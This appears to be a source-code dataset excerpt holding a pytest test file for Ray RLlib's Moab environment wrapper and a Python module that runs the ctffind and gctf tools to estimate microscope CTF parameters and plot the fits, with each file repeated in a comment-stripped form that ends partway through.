] | 3 | 2021-06-22T19:57:41.000Z | 2021-06-23T07:16:44.000Z | rllib/env/wrappers/tests/test_moab_wrapper.py | BonsaiAI/ray | 941d30f082fe879ea30618af14327c25b5a21a74 | [
"Apache-2.0"
] | 26 | 2020-03-14T19:27:37.000Z | 2022-03-30T21:45:17.000Z | rllib/env/wrappers/tests/test_moab_wrapper.py | BonsaiAI/ray | 941d30f082fe879ea30618af14327c25b5a21a74 | [
"Apache-2.0"
] | 2 | 2021-05-05T21:05:16.000Z | 2021-06-22T21:16:03.000Z | from typing import Optional
import gym
import pytest
from ray.rllib.env.wrappers.moab_wrapper import _MoabBaseWrapper
from ray.tune.registry import ENV_CREATOR, _global_registry
@pytest.mark.parametrize("env_name, iterations",
[
("MoabMoveToCenterSim-v0", 10),
("MoabMoveToCenterPartialObservableSim-v0", 10),
("MoabMoveToCenterAvoidObstacleSim-v0", 3),],
)
@pytest.mark.parametrize("randomize_ball", [True, False])
@pytest.mark.parametrize("randomize_obstacle", [True, False])
@pytest.mark.parametrize("seed", [None, 1])
class TestMoabWrapper:
@pytest.fixture
def env_name(self) -> str:
return "MoabMoveToCenterSim-v0"
@pytest.fixture
def randomize_ball(self) -> bool:
return False
@pytest.fixture
def randomize_obstacle(self) -> bool:
return False
@pytest.fixture
def seed(self) -> Optional[int]:
return None
@pytest.fixture
def iterations(self) -> int:
return 3
@pytest.fixture
def moab_env(self,
env_name: str,
randomize_ball: bool,
randomize_obstacle: bool,
seed: Optional[int]) -> _MoabBaseWrapper:
env_creator = _global_registry.get(ENV_CREATOR, env_name)
env_config = {
"randomize_ball": randomize_ball,
"randomize_obstacle": randomize_obstacle,
"seed": seed,
}
return env_creator(env_config)
def test_observation_space(self, moab_env: _MoabBaseWrapper, iterations: int):
obs = moab_env.reset()
assert (moab_env.observation_space.contains(obs),
f"{moab_env.observation_space} doesn't contain {obs}")
new_obs, _, _, _ = moab_env.step(moab_env.action_space.sample())
assert moab_env.observation_space.contains(new_obs)
def test_action_space_conversion(self, moab_env: _MoabBaseWrapper, iterations: int):
assert isinstance(moab_env.action_space, gym.spaces.Box)
moab_env.reset()
action = moab_env.action_space.sample()
moab_env.step(action)
def test_few_iterations(self, moab_env: _MoabBaseWrapper, iterations: int):
moab_env.reset()
for _ in range(iterations):
moab_env.step(moab_env.action_space.sample())
| 33.901408 | 88 | 0.633153 | from typing import Optional
import gym
import pytest
from ray.rllib.env.wrappers.moab_wrapper import _MoabBaseWrapper
from ray.tune.registry import ENV_CREATOR, _global_registry
@pytest.mark.parametrize("env_name, iterations",
[
("MoabMoveToCenterSim-v0", 10),
("MoabMoveToCenterPartialObservableSim-v0", 10),
("MoabMoveToCenterAvoidObstacleSim-v0", 3),],
)
@pytest.mark.parametrize("randomize_ball", [True, False])
@pytest.mark.parametrize("randomize_obstacle", [True, False])
@pytest.mark.parametrize("seed", [None, 1])
class TestMoabWrapper:
@pytest.fixture
def env_name(self) -> str:
return "MoabMoveToCenterSim-v0"
@pytest.fixture
def randomize_ball(self) -> bool:
return False
@pytest.fixture
def randomize_obstacle(self) -> bool:
return False
@pytest.fixture
def seed(self) -> Optional[int]:
return None
@pytest.fixture
def iterations(self) -> int:
return 3
@pytest.fixture
def moab_env(self,
env_name: str,
randomize_ball: bool,
randomize_obstacle: bool,
seed: Optional[int]) -> _MoabBaseWrapper:
env_creator = _global_registry.get(ENV_CREATOR, env_name)
env_config = {
"randomize_ball": randomize_ball,
"randomize_obstacle": randomize_obstacle,
"seed": seed,
}
return env_creator(env_config)
def test_observation_space(self, moab_env: _MoabBaseWrapper, iterations: int):
obs = moab_env.reset()
assert (moab_env.observation_space.contains(obs),
f"{moab_env.observation_space} doesn't contain {obs}")
new_obs, _, _, _ = moab_env.step(moab_env.action_space.sample())
assert moab_env.observation_space.contains(new_obs)
def test_action_space_conversion(self, moab_env: _MoabBaseWrapper, iterations: int):
assert isinstance(moab_env.action_space, gym.spaces.Box)
moab_env.reset()
action = moab_env.action_space.sample()
moab_env.step(action)
def test_few_iterations(self, moab_env: _MoabBaseWrapper, iterations: int):
moab_env.reset()
for _ in range(iterations):
moab_env.step(moab_env.action_space.sample())
| true | true |
f7101a37da6bdc31a3c3985e7b25b86ddef44ed1 | 29,931 | py | Python | code/pyto/tomo/ctf.py | anmartinezs/pyseg_system | 5bb07c7901062452a34b73f376057cabc15a13c3 | [
"Apache-2.0"
] | 12 | 2020-01-08T01:33:02.000Z | 2022-03-16T00:25:34.000Z | code/pyto/tomo/ctf.py | anmartinezs/pyseg_system | 5bb07c7901062452a34b73f376057cabc15a13c3 | [
"Apache-2.0"
] | 8 | 2019-12-19T19:34:56.000Z | 2022-03-10T10:11:28.000Z | code/pyto/tomo/ctf.py | anmartinezs/pyseg_system | 5bb07c7901062452a34b73f376057cabc15a13c3 | [
"Apache-2.0"
] | 2 | 2022-03-30T13:12:22.000Z | 2022-03-30T18:12:10.000Z | """
Functions related to ctf.
Currently only few that allow running ctffind from console or notebook.
Work in progress.
# Author: Vladan Lucic (Max Planck Institute for Biochemistry)
# $Id$
"""
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from builtins import zip
from builtins import str
from builtins import range
from builtins import object
from past.utils import old_div
from past.builtins import basestring
__version__ = "$Revision$"
import os
import subprocess
import logging
import numpy as np
import matplotlib.pyplot as plt
import pyto.util.nested
from pyto.io.image_io import ImageIO
from pyto.grey.image import Image
class Ctf(object):
"""
Determination of CTF by external tools
"""
# prefix for validation attributed obtained from gctf
validation_prefix = "validation_"
# default params ctffind 4.0.17, also 4.1
default_params_ctffind = {
"pixel_a":1, "cs":2.7, "amp":0.1, "phase":"no", 'box':512,
'min_res':30, 'max_res':5, 'min_def':5000, 'max_def':50000,
'def_step':500, 'astig':100, 'known_astig':'no', 'slow_search':'yes',
'restraint_astig':'yes', 'tolerated_astig':200,
'phase':'yes', 'min_phase':0, 'max_phase':2, 'phase_step':0.1,
'expert':'no'}
# parameter list for ctffind 4.0.17 (currently not used, left for reference)
param_names_ctffind_4_0 = [
'pixel_a', 'voltage', 'cs', 'amp', 'box', 'min_res', 'max_res',
'min_def', 'max_def', 'def_step', 'astig', 'phase',
'min_phase', 'max_phase', 'phase_step']
# default parameter list for 4.1; consistent with default_params_ctffind
param_names_ctffind_4_1 = [
'pixel_a', 'voltage', 'cs', 'amp', 'box', 'min_res', 'max_res',
'min_def', 'max_def', 'def_step', 'known_astig', 'slow_search',
'restraint_astig','tolerated_astig',
'phase', 'min_phase', 'max_phase', 'phase_step', 'expert']
def __init__(self):
"""
Initializes common attributes
"""
# attributes
self.image_path_orig = []
self.image_inds = []
self.image_path = []
self.ctf_path = []
self.phases = []
self.defoci_1 = []
self.defoci_2 = []
self.defoci = []
self.resolution = []
self.pixel_a = []
self.angle = []
@classmethod
def find(
cls, image_dir, image_prefix, ctf_dir, params, pixel_a=None,
flatten='auto', tool='ctffind', executable=None,
param_file='ctf_params.txt', fast=False, max_images=None,
plot_ctf=True, plot_ps=True, b_plot=True, exp_f_plot=False,
show_legend=True, plot_phases=True, plot_defoci=True,
plot_resolution=True, print_results=True, print_validation=False):
"""
Determines and shows CTF fits for multiple images.
All files located in (arg) image_dir whose namess start with (arg)
image_prefix and that have extension mrc, em or st are selected
for the ctf determination.
If a selected file is 3D (image stack), and arg flatten is True or
'auto', all z-slices are summed up (saved in ctf_dir) and the ctf
is detemined on the resulting (flattened. Alternatively, if arg
flatten is False, z-slices are extracted, saved in ctf_dir and
analyzed separately.
All resulting files, as well as the extraced or flattened images
(in case of 3D files) are saved or moved to directory ctf_dir.
CTF is determined using external tools. Current options are:
- CTFFIND
- gCTF
These tools have to be installed externally.
Parameters for the ctf tools are specified as a dictionary (arg params).
Parameters used for both ctffind and gctf are:
- 'pixel_a', 'voltage', 'cs', 'amp', 'box', 'min_res', 'max_res',
'min_def', 'max_def', 'def_step', 'astig', 'phase',
'min_phase', 'max_phase', 'phase_step'
Voltage ('voltage') should always be specified. The pixel size
(pixel_a) has to be specified in case it can not be read from
the image header. All other parameters are optional, if they are
not specified the ctffind / gctg default values are used.
The default values should be fine for single particle images.
Parameter recommendations for phase plate images are given in
the ctffind / gctf documentation.
In case of ctffind, arg params can also be a list containing the
parameter values in the same order as specified above, starting
with voltage.
Important for ctffind: Because the required arguments differ between
versions 4.0 and 4.1, as well as depend on values specified, it is
not guaranteed that the dictionary form of arg params will work.
In case of problems, specify params as a list.
In addition, all other gctf arguments can also be specified
(without '--'). It is suggested to use:
'do_EPA':'', 'do_validation':''
Parameter units are the same as in the ctf deterimantion tools.
Intended for use in an environment such as Jupyter notebook.
Arguments:
- image_dir: directory where images reside
- image prefix: beginning of image file(s)
- ctf_dir: directory where the ctf determination results and
extracted images are saved
- pixel_a: pixel size in A
- params: ctf determination parameters
- flatten: indicated whether 3D images should be flatten (True or
'auto') or not (False).
- tool: name of the ctf detmination tool
- executable: ctf tool executable
- param_file: name of the temporary parameter file
- fast: flag indicating whether ctffind --fast option is used
- print_results: flag indicating if phase and defoci found
are printed for each analyzed image
- plot_ctf: flag indicating whether ctf is plotted for each
analyzed image
- show_legend: flag indicating whether a legend is shown on ctf graphs
- plot_phases, plot_defoci: flags indicating whether a graph
containing phases and defoci of all images respectivelly are plotted
- max_images: max number if image analyzed, for testing
Returns an instance of this class. The following attributes are all
lists where elements correspond to individual images:
- image_path_orig: image path of the input file
- image_path: image path of the image that is actually used
to deterime ctf. It differs from image_path_orig if the original
(input) image is a stack that is flattened or used to extract slices
- image_inds: index of a slice extracted for a stack
- ctf_path: path of the ctf fit image
- defocus_1, defocus_2, defocus: defoci along the two axes and the
mean defocus in um
- angle: defocus (astigmatism) angle
- phase: phase shift in multiples of pi
- resolution: resolution in nm
- ccc: correlation coefficient
- pixel_a: pixel size in A
- b_factor: b-factor (gctf only)
"""
# initialize
index = 0
new = cls()
print_head = True
if plot_ctf and fast:
print(
"Warning: CTF will not be plotted because fast execution"
+ " was chosen")
# check which ctf tool to use
if tool == 'ctffind':
if executable is None:
executable = 'ctffind'
elif tool == 'gctf':
if executable is None:
executable = 'gctf'
else:
raise ValueError(
"CTF determination tool " + str(tool) + " was not understood.")
new.tool = tool
# cftfind on all images
file_list = np.sort(os.listdir(image_dir))
for image_name in file_list:
# skip files that are not images
if not image_name.startswith(image_prefix): continue
if not (image_name.endswith('.mrc') or image_name.endswith('.st')
or image_name.endswith('.em')):
continue
if image_name.endswith('ctf.mrc'): continue
# set input image path
image_path = os.path.join(image_dir, image_name)
# figure out if to flatten or not (just once, assume all files
# are the same)
im_io = ImageIO(file=image_path)
if image_name.endswith('.st'):
im_io.readHeader(fileFormat='mrc')
else:
im_io.readHeader()
z_dim = im_io.shape[2]
n_digits = int(np.ceil(np.log10(z_dim)))
if isinstance(flatten, bool):
pass
elif isinstance(flatten, basestring) and (flatten == 'auto'):
if z_dim > 1:
flatten = True
else:
flatten = False
else:
raise ValueError(
"Argument flatten: "+ str(flatten) +" was not understood.")
# load stack and prepare image name, if need to extract images
if (z_dim > 1) and not flatten:
image_dir, image_name = os.path.split(image_path)
image_base, image_extension = image_name.rsplit('.', 1)
image_name_new_tmplt = (
image_base + '_%0' + str(n_digits) + 'd.mrc')
if image_name.endswith('.st'):
stack = Image.read(
image_path, memmap=True, fileFormat='mrc')
else:
stack = Image.read(image_path, memmap=True)
else:
image_path_to_read = image_path
# find ctf of the current image or stack
for image_in_stack_ind in range(z_dim):
# extract and save images if needed
if (z_dim > 1) and not flatten:
if not os.path.exists(ctf_dir): os.makedirs(ctf_dir)
image_path_to_read = os.path.join(
ctf_dir, (image_name_new_tmplt % image_in_stack_ind))
one_image = Image()
one_image.data = stack.data[:,:,image_in_stack_ind]
one_image.write(
file=image_path_to_read, pixel=stack.pixelsize)
# save image path retlated
new.image_path_orig.append(image_path)
new.image_inds.append(image_in_stack_ind)
new.image_path.append(image_path_to_read)
# find ctf
if tool == 'ctffind':
# ctffind
res_one = cls.ctffind(
image_path=image_path_to_read, flatten=flatten,
ctf_dir=ctf_dir, executable=executable,
pixel_a=pixel_a, params=params,
param_file=param_file, fast=fast, print_head=print_head,
print_results= print_results,
plot_ctf=plot_ctf, show_legend=show_legend)
elif tool == 'gctf':
# gctf
res_one = cls.gctf(
image_path=image_path_to_read, params=params,
pixel_a=pixel_a, flatten=flatten, ctf_dir=ctf_dir,
executable=executable,
plot_ctf=plot_ctf, plot_ps=plot_ps ,b_plot=b_plot,
exp_f_plot=exp_f_plot, show_legend=show_legend,
print_results=print_results,
print_head=print_head,
print_validation=print_validation)
# save gctf specific data
try:
new.b_factor.append(res_one['b_factor'])
except AttributeError:
new.b_factor = [res_one['b_factor']]
for name, value in list(res_one.items()):
if name.startswith(cls.validation_prefix):
try:
previous_val = getattr(new, name)
previous_val.append(value)
setattr(new, name, previous_val)
except AttributeError:
setattr(new, name, [value])
else:
raise ValueError("Sorry tool: " + tool + " was not found.")
# save data common for ctffind and gctf
new.phases.append(res_one["phase"])
new.defoci.append(res_one["defocus"])
new.defoci_1.append(res_one['defocus_1'])
new.defoci_2.append(res_one['defocus_2'])
new.resolution.append(res_one['resolution'])
new.pixel_a.append(res_one['pixel_a'])
new.angle.append(res_one['angle'])
new.ctf_path.append(res_one['ctf_path'])
# keep track of n images processed so far
print_head = False
index = index + 1
if (max_images is not None) and (index > max_images): break
if flatten: break
# plot phases
if plot_phases:
plt.figure()
plt.bar(list(range(index)), new.phases)
plt.plot([0, index], [0.5, 0.5], 'r--')
plt.ylabel('Phase shift [$\pi$]')
plt.xlabel('Images')
plt.title("Phase shift summary")
# plot defocus
if plot_defoci:
plt.figure()
plt.bar(list(range(index)), new.defoci)
plt.ylabel('Defocus [$\mu m$]')
plt.xlabel('Images')
plt.title("Defocus summary")
# plot resolution
if plot_resolution:
plt.figure()
plt.bar(list(range(index)), new.resolution)
plt.ylabel('Resolution [nm]')
plt.xlabel('Images')
plt.title("Resolution summary")
return new
@classmethod
def ctffind(
cls, image_path, ctf_dir, params, pixel_a=None, flatten=False,
executable='ctffind', param_file='ctf_params.txt', fast=False,
print_results=True, print_head=True,
plot_ctf=True, show_legend=True):
"""
Determines and shows CTF fits of one image using ctffind.
See find() for more information.
"""
# make ctf dir if doesn't exist
if not os.path.exists(ctf_dir): os.makedirs(ctf_dir)
# find pixel size
if pixel_a is None:
pixel_a = cls.read_pixel_size(image_path=image_path)
# flatten frame stack
if flatten:
image_path = cls.flatten_stack(
stack_path=image_path, flat_dir=ctf_dir)
# default params ctffind 4.0.17 (moved to top of this file anyway)
#default_params = {
# "pixel_a":1, "cs":2.7, "amp":0.1, "phase":"no", 'box':512,
# 'min_res':30, 'max_res':5, 'min_def':5000, 'max_def':50000,
# 'def_step':500, 'astig':100, 'phase':'no', 'min_phase':0,
# 'max_phase':2, 'phase_step':0.1}
#param_names = [
# 'pixel_a', 'voltage', 'cs', 'amp', 'box', 'min_res', 'max_res',
# 'min_def', 'max_def', 'def_step', 'astig', 'phase',
# 'min_phase', 'max_phase', 'phase_step']
# keep params if list, add default if dict
if isinstance(params, list):
comb_params = [pixel_a] + params
elif isinstance(params, dict):
params_dict = cls.default_params_ctffind.copy()
params_dict.update(params)
params_dict['pixel_a'] = pixel_a
param_names = cls.make_param_names_ctffind(params=params_dict)
comb_params = [params_dict[name] for name in param_names]
# set ctffind out paths
image_dir, image_name = os.path.split(image_path)
image_base, image_extension = image_name.rsplit('.', 1)
ctf_path = os.path.join(ctf_dir, image_base + '_ctf.mrc')
ctf_txt_path = os.path.join(ctf_dir, image_base + '_ctf.txt')
ctf_avrot_path = os.path.join(ctf_dir, image_base + '_ctf_avrot.txt')
# wite ctf parameters to a file
param_path = os.path.join(ctf_dir, param_file)
pf = open(param_path, 'w')
pf.write(image_path + '\n')
pf.write(ctf_path + '\n')
str_params = [str(par) + '\n' for par in comb_params]
pf.writelines(str_params)
pf.flush()
# execute ctffind
# shell commands that work:
# - ctffind < param_path
# - cat params.txt | ctffind
#print(image)
if fast:
ctf_cmd = [executable, '--fast']
else:
ctf_cmd = [executable]
try:
subprocess.check_call(ctf_cmd, stdin=open(param_path))
except Exception as exc:
# workaround for ctffind command returning code 255 (4.1.8, 09.2018)
logging.debug('CalledProcessError: ' + str(exc))
# read results:
ctf_txt = np.loadtxt(ctf_txt_path)
results = {
"defocus_1":ctf_txt[1]/10000., "defocus_2":ctf_txt[2]/10000.,
"angle" : ctf_txt[3], "phase":old_div(ctf_txt[4],np.pi),
"ccc" : ctf_txt[5], "resolution" : ctf_txt[6] / 10.,
'pixel_a':pixel_a}
results['defocus'] = (results['defocus_1'] + results['defocus_2']) / 2.
results['ctf_path'] = ctf_path
# prepare header for defoci and phases
if print_head:
left_space = ' ' * old_div((len(image_name) - 5), 2)
right_space = ' ' *old_div ((len(image_name) - 4), 2)
head_1 = (
left_space + "Image" + right_space +
" Defocus 1 Defocus 2 Phase Resolution")
head_2 = (
left_space + " " + right_space +
" um um [pi] nm ")
# prepare results
if print_results:
data_format = '%s %6.2f %6.2f %6.2f %6.2f '
data_vars = (
image_name, results["defocus_1"], results["defocus_2"],
results["phase"], results["resolution"])
# print
if print_head:
print(head_1)
print(head_2)
if print_results:
print(data_format % data_vars)
# plot ctf
if plot_ctf:
plt.figure()
avrot_data = np.loadtxt(ctf_avrot_path)
x_data = avrot_data[0] / pixel_a
plt.plot(x_data, avrot_data[2], 'g-', label='PS')
plt.plot(
x_data, avrot_data[3], color='orange', linewidth=2,
label='CTF fit')
plt.plot(
x_data, avrot_data[4], color='blue', linewidth=2,
label='Quality')
plt.ylim(-0.1, 1.1)
plt.xlabel("Spatial frequency [1/A])")
plt.ylabel("Amplitude")
if show_legend: plt.legend()
plt.show()
return results
@classmethod
def make_param_names_ctffind(cls, params):
"""
Makes a list of parameter names that's suitable for ctffind 4.1 and
it is in accordance with the specified params.
Argument:
- params: dict of parameters
Returns parameter list
"""
# optional parts
if params['restraint_astig'] in ['yes', 'y']:
restraint_astig_part = ['restraint_astig','tolerated_astig']
else:
restraint_astig_part = ['restraint_astig']
if (params['phase'] == 'yes') or (params['phase'] == 'y'):
phase_part = ['phase', 'min_phase', 'max_phase', 'phase_step']
else:
phase_part = ['phase']
# combine
param_names = (
cls.param_names_ctffind_4_1[:12] + restraint_astig_part
+ phase_part + ['expert'])
return param_names
@classmethod
def gctf(
cls, image_path, ctf_dir, params, pixel_a=None, flatten=False,
executable='gctf', plot_ps=True, plot_ctf=True,
b_plot=True, exp_f_plot=False, show_legend=True,
print_results=True, print_head=True, print_validation=False):
"""
Determines and shows CTF fits of one image using gctf.
See find() for more information.
"""
# make ctf dir if doesn't exist
if not os.path.exists(ctf_dir): os.makedirs(ctf_dir)
# find pixel size
if pixel_a is None:
pixel_a = cls.read_pixel_size(image_path=image_path)
# flatten frame stack if needed
if flatten:
image_path = cls.flatten_stack(
stack_path=image_path, flat_dir=ctf_dir)
# prepare parameters
gctf_names = {
'pixel_a':'apix', 'voltage':'kV', 'cs':'Cs', 'amp':'ac',
'box':'boxsize', 'min_res':'resL', 'max_res':'resH',
'min_def':'defL', 'max_def':'defH', 'def_step':'defS',
'astig':'astm', 'phase':'phase', 'min_phase':'phase_shift_L',
'max_phase':'phase_shift_H', 'phase_step':'phase_shift_S'}
params["pixel_a"] = pixel_a
params_list = [
["--" + gctf_names.get(key, key), str(val)]
for key, val in list(params.items())]
params_list = pyto.util.nested.flatten(params_list)
params_list = [par for par in params_list if len(par) > 0]
#print(params_list)
# execute ctffind
ctf_cmd = [executable] + params_list + [image_path]
call_status = subprocess.check_call(ctf_cmd)
# set gctf out paths
image_dir, image_name = os.path.split(image_path)
image_base, image_extension = image_name.rsplit('.', 1)
epa_path = os.path.join(ctf_dir, image_base + '_EPA.log')
gctf_path = os.path.join(ctf_dir, image_base + '_gctf.log')
ctf_path = os.path.join(ctf_dir, image_base + '.ctf')
tmp_epa_path = os.path.join(image_dir, image_base + '_EPA.log')
tmp_gctf_path = os.path.join(image_dir, image_base + '_gctf.log')
tmp_ctf_path = os.path.join(image_dir, image_base + '.ctf')
# move generated files to ctf_dir
if image_dir != ctf_dir:
call_status = subprocess.check_call(['mv', tmp_epa_path, epa_path])
call_status = subprocess.check_call(
['mv', tmp_gctf_path, gctf_path])
call_status = subprocess.check_call(['mv', tmp_ctf_path, ctf_path])
call_status = subprocess.check_call(
['mv', 'micrographs_all_gctf.star', ctf_dir])
# read results
in_last_cycle = False
in_last_cycle_data = False
validation_lines = []
for line in open(gctf_path):
# read defocus
if line.find('LAST CYCLE') >= 0:
in_last_cycle = True
#print line.strip('\n')
elif in_last_cycle and (line.find('Defocus_U') >= 0):
#print line.strip('\n')
head_split = line.strip().split()
in_last_cycle_data = True
elif in_last_cycle_data:
#print line.strip('\n')
data_split = line.strip().split()[:-2]
in_last_cycle_data = False
# read res limit and b factor
elif in_last_cycle and line.startswith('Resolution limit'):
resolution = float(line.split()[-1])
elif in_last_cycle and line.startswith('Estimated Bfactor'):
b_factor = float(line.split()[-1])
in_last_cycle = False
# read validation
elif line.find('VALIDATION_SCORE') >= 0:
validation_lines.append(line.strip('\n'))
# extract results
results_native = dict(
[(head, float(value))
for head, value in zip(head_split, data_split)])
results_native["Defocus_U"] = results_native["Defocus_U"] / 10000.
results_native["Defocus_V"] = results_native["Defocus_V"] / 10000.
#print(results_native)
key_dict = {
"Defocus_U":"defocus_1", "Defocus_V":"defocus_2",
"Angle":"angle", "CCC":"ccc", "Phase_shift":"phase"}
results = dict([
(key_dict[old_key], value)
for old_key, value in list(results_native.items())])
results['defocus'] = (results['defocus_1'] + results['defocus_2']) / 2.
results['phase'] = results.get('phase', 0) / 180.
results["resolution"] = resolution / 10.
results["b_factor"] = b_factor
#if results.get("phase") is None: results["phase"] = 0
results['ctf_path'] = ctf_path
results['pixel_a'] = pixel_a
for val_line in validation_lines:
val_list = val_line.strip().split()
name_suf = val_list[0].replace('-', '_')
results[cls.validation_prefix + name_suf] = int(val_list[-1])
# prepare header for defoci and phases
if print_head:
left_space = ' ' * (old_div((len(image_name) - 5), 2))
right_space = ' ' * (old_div((len(image_name) - 4), 2))
head_1 = (
left_space + "Image" + right_space +
" Defocus 1 Defocus 2 Phase Resolution")
head_2 = (
left_space + " " + right_space +
" um um [pi] nm ")
# prepare results
if print_results:
data_format = '%s %6.2f %6.2f %6.2f %6.2f '
data_vars = (
image_name, results["defocus_1"], results["defocus_2"],
results["phase"], results["resolution"])
# add validation to header and results
val_names = np.sort(
[val_nam for val_nam in results
if val_nam.startswith(cls.validation_prefix)])[::-1]
for val_nam in val_names:
if print_head:
head_1 += (" " + val_nam.split(cls.validation_prefix, 1)[1])
head_2 += " "
if print_results:
data_format += ' %2d '
data_vars += (results[val_nam],)
# print
if print_head:
print(head_1)
print(head_2)
if print_results:
print(data_format % data_vars)
# print validation
if print_validation:
for val_line in validation_lines:
print(val_line)
# plot ctf
epa = np.loadtxt(epa_path, skiprows=1)
if plot_ps:
plt.figure()
plt.plot(1./epa[:,0], epa[:,2])
plt.ylabel('ln(|F|)')
#if show_legend: plt.legend()
plt.show()
if plot_ctf:
plt.figure()
if b_plot:
exp_b = np.exp(-b_factor * 1./epa[:,0]**2 / 4.)
else:
exp_b = 1
plt.plot(1./epa[:,0], epa[:,1] * exp_b, label="CTF fit")
if exp_f_plot:
plt.plot(
1./epa[:,0], np.exp(epa[:,3]), label="$e^{ln(|F|-Bg)}$")
else:
plt.plot(1./epa[:,0], epa[:,3], label="$ln(|F|-Bg)$")
plt.xlabel('Resolution [1/A]')
if show_legend: plt.legend()
plt.show()
# return
return results
@classmethod
def read_pixel_size(cls, image_path):
"""
Reads pixel size from an image file.
Raises ValueError if pixel size can not be read from the image
Argument:
- image_path: image path
Returns: pixel size in A
"""
image_io = ImageIO()
if image_path.endswith('.st'):
image_io.readHeader(file=image_path, fileFormat='mrc')
else:
image_io.readHeader(file=image_path)
if image_io.pixel is not None:
if isinstance(image_io.pixel, (list, tuple)):
pixel_a = 10 * image_io.pixel[0]
else:
pixel_a = 10 * image_io.pixel
else:
raise ValueError(
"Pixel size could not be found from image " + image_path +
". Please specify pixel_a as an argument.")
# in case of 0 pix size
if pixel_a == 0:
raise ValueError(
"Pixel size could not be found from image " + image_path +
". Please specify pixel_a as an argument.")
return pixel_a
@classmethod
def flatten_stack(cls, stack_path, flat_dir):
"""
Flattens image stack, that is sums up all z-slices and writes
the resulting (flat) image).
Arguments:
- stack_path: path to the image stack
- flat_path: path where the resulting image is saved
Returns resulting image path
"""
# parse stack path
stack_dir, stack_name = os.path.split(stack_path)
stack_base, stack_extension = stack_name.rsplit('.', 1)
if stack_extension == 'st':
stack_extension = 'mrc'
file_format = 'mrc'
else:
file_format = None
# read, flatten and write
flat_path = os.path.join(
flat_dir, stack_base + '_flat.' + stack_extension)
frame = Image.read(file=stack_path, fileFormat=file_format)
frame.data = np.sum(frame.data, axis=2, dtype=frame.data.dtype)
frame.write(file=flat_path, pixel=frame.pixelsize)
return flat_path
| 39.074413 | 80 | 0.558685 | from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from builtins import zip
from builtins import str
from builtins import range
from builtins import object
from past.utils import old_div
from past.builtins import basestring
__version__ = "$Revision$"
import os
import subprocess
import logging
import numpy as np
import matplotlib.pyplot as plt
import pyto.util.nested
from pyto.io.image_io import ImageIO
from pyto.grey.image import Image
class Ctf(object):
validation_prefix = "validation_"
default_params_ctffind = {
"pixel_a":1, "cs":2.7, "amp":0.1, "phase":"no", 'box':512,
'min_res':30, 'max_res':5, 'min_def':5000, 'max_def':50000,
'def_step':500, 'astig':100, 'known_astig':'no', 'slow_search':'yes',
'restraint_astig':'yes', 'tolerated_astig':200,
'phase':'yes', 'min_phase':0, 'max_phase':2, 'phase_step':0.1,
'expert':'no'}
param_names_ctffind_4_0 = [
'pixel_a', 'voltage', 'cs', 'amp', 'box', 'min_res', 'max_res',
'min_def', 'max_def', 'def_step', 'astig', 'phase',
'min_phase', 'max_phase', 'phase_step']
param_names_ctffind_4_1 = [
'pixel_a', 'voltage', 'cs', 'amp', 'box', 'min_res', 'max_res',
'min_def', 'max_def', 'def_step', 'known_astig', 'slow_search',
'restraint_astig','tolerated_astig',
'phase', 'min_phase', 'max_phase', 'phase_step', 'expert']
def __init__(self):
self.image_path_orig = []
self.image_inds = []
self.image_path = []
self.ctf_path = []
self.phases = []
self.defoci_1 = []
self.defoci_2 = []
self.defoci = []
self.resolution = []
self.pixel_a = []
self.angle = []
@classmethod
def find(
cls, image_dir, image_prefix, ctf_dir, params, pixel_a=None,
flatten='auto', tool='ctffind', executable=None,
param_file='ctf_params.txt', fast=False, max_images=None,
plot_ctf=True, plot_ps=True, b_plot=True, exp_f_plot=False,
show_legend=True, plot_phases=True, plot_defoci=True,
plot_resolution=True, print_results=True, print_validation=False):
index = 0
new = cls()
print_head = True
if plot_ctf and fast:
print(
"Warning: CTF will not be plotted because fast execution"
+ " was chosen")
if tool == 'ctffind':
if executable is None:
executable = 'ctffind'
elif tool == 'gctf':
if executable is None:
executable = 'gctf'
else:
raise ValueError(
"CTF determination tool " + str(tool) + " was not understood.")
new.tool = tool
file_list = np.sort(os.listdir(image_dir))
for image_name in file_list:
if not image_name.startswith(image_prefix): continue
if not (image_name.endswith('.mrc') or image_name.endswith('.st')
or image_name.endswith('.em')):
continue
if image_name.endswith('ctf.mrc'): continue
image_path = os.path.join(image_dir, image_name)
im_io = ImageIO(file=image_path)
if image_name.endswith('.st'):
im_io.readHeader(fileFormat='mrc')
else:
im_io.readHeader()
z_dim = im_io.shape[2]
n_digits = int(np.ceil(np.log10(z_dim)))
if isinstance(flatten, bool):
pass
elif isinstance(flatten, basestring) and (flatten == 'auto'):
if z_dim > 1:
flatten = True
else:
flatten = False
else:
raise ValueError(
"Argument flatten: "+ str(flatten) +" was not understood.")
if (z_dim > 1) and not flatten:
image_dir, image_name = os.path.split(image_path)
image_base, image_extension = image_name.rsplit('.', 1)
image_name_new_tmplt = (
image_base + '_%0' + str(n_digits) + 'd.mrc')
if image_name.endswith('.st'):
stack = Image.read(
image_path, memmap=True, fileFormat='mrc')
else:
stack = Image.read(image_path, memmap=True)
else:
image_path_to_read = image_path
for image_in_stack_ind in range(z_dim):
if (z_dim > 1) and not flatten:
if not os.path.exists(ctf_dir): os.makedirs(ctf_dir)
image_path_to_read = os.path.join(
ctf_dir, (image_name_new_tmplt % image_in_stack_ind))
one_image = Image()
one_image.data = stack.data[:,:,image_in_stack_ind]
one_image.write(
file=image_path_to_read, pixel=stack.pixelsize)
new.image_path_orig.append(image_path)
new.image_inds.append(image_in_stack_ind)
new.image_path.append(image_path_to_read)
if tool == 'ctffind':
res_one = cls.ctffind(
image_path=image_path_to_read, flatten=flatten,
ctf_dir=ctf_dir, executable=executable,
pixel_a=pixel_a, params=params,
param_file=param_file, fast=fast, print_head=print_head,
print_results= print_results,
plot_ctf=plot_ctf, show_legend=show_legend)
elif tool == 'gctf':
res_one = cls.gctf(
image_path=image_path_to_read, params=params,
pixel_a=pixel_a, flatten=flatten, ctf_dir=ctf_dir,
executable=executable,
plot_ctf=plot_ctf, plot_ps=plot_ps ,b_plot=b_plot,
exp_f_plot=exp_f_plot, show_legend=show_legend,
print_results=print_results,
print_head=print_head,
print_validation=print_validation)
try:
new.b_factor.append(res_one['b_factor'])
except AttributeError:
new.b_factor = [res_one['b_factor']]
for name, value in list(res_one.items()):
if name.startswith(cls.validation_prefix):
try:
previous_val = getattr(new, name)
previous_val.append(value)
setattr(new, name, previous_val)
except AttributeError:
setattr(new, name, [value])
else:
raise ValueError("Sorry tool: " + tool + " was not found.")
new.phases.append(res_one["phase"])
new.defoci.append(res_one["defocus"])
new.defoci_1.append(res_one['defocus_1'])
